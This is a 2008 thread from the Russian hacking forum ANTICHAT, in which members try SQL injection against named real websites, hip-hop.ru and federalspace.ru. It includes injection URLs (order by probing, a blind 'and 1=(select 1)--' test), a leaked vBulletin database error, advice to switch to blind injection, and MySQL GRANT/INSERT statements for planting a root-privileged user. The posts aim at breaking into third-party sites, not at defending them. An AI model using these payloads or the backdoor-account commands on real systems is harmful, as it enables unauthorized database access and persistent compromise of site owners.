ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.01.2008, 09:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
KIR@PRO, ознакомтесь
Код:
http://www.securitylab.ru/contest/212101.php
|
|
|
17.01.2008, 17:29
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
чего это такое?
hip-hop.ru/forum/ban.php?by=order%20by%201--
<!-- Database error in vBulletin 3.6.8: Invalid SQL: SELECT userid, adminid,bandate, liftdate, reason FROM userban WHERE liftdate > 0 ORDER BY order by 1-- ASC; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1-- ASC' at line 1 Error Number : 1064 Date : Thursday, January 17th 2008 @ 04:26:06 PM Script : http://hip-hop.ru/forum/ban.php?by=order%20by%201-- Referrer : IP Address : my_ip Username : my_nickname Classname : vB_Database -->
Последний раз редактировалось it's my; 17.01.2008 в 18:05..
|
|
|
|
17.01.2008, 17:49
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
А это слепая инъекция
|
|
|
|
17.01.2008, 17:56
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
мну эта еще не проходил, дай мануал/статью
|
|
|
|
17.01.2008, 18:33
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
спасибо много нового узнал но так ни че с этим и не получилось я раззстроен... всем спасибо за помощь
|
|
|
|
17.01.2008, 18:35
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Не могу понять
http://www.federalspace.ru/DocDoSele.asp?DocID=46 это урл правильный
Пробую так http://www.federalspace.ru/DocDoSele.asp?DocID=46-1
Выдает значение эквивалентное http://www.federalspace.ru/DocDoSele.asp?DocID=45
Дополнительно пробую http://www.federalspace.ru/DocDoSele.asp?DocID=46+order+by+16-- - ОШИБКА! order+by+15-- ВСЕ НОРМАЛЬНО!
Делаю вывод что возможна скуль-иньект. Но выполнить иньекцию не выходит  Почему так?
В других скриптах на этом сайте похожая ситуация. |
|
|
|
17.01.2008, 18:43
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Ордер выдает что полей 15 а униону пофек ^^
|
|
|
|
18.01.2008, 00:53
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Ага, там стоит старая бд! Так что придется делать инъект в слепую...
select то работает:
http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)--  |
|
|
|
18.01.2008, 02:38
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?
|
|
|
|
18.01.2008, 02:52
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION
или
INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y", "Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y ");
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
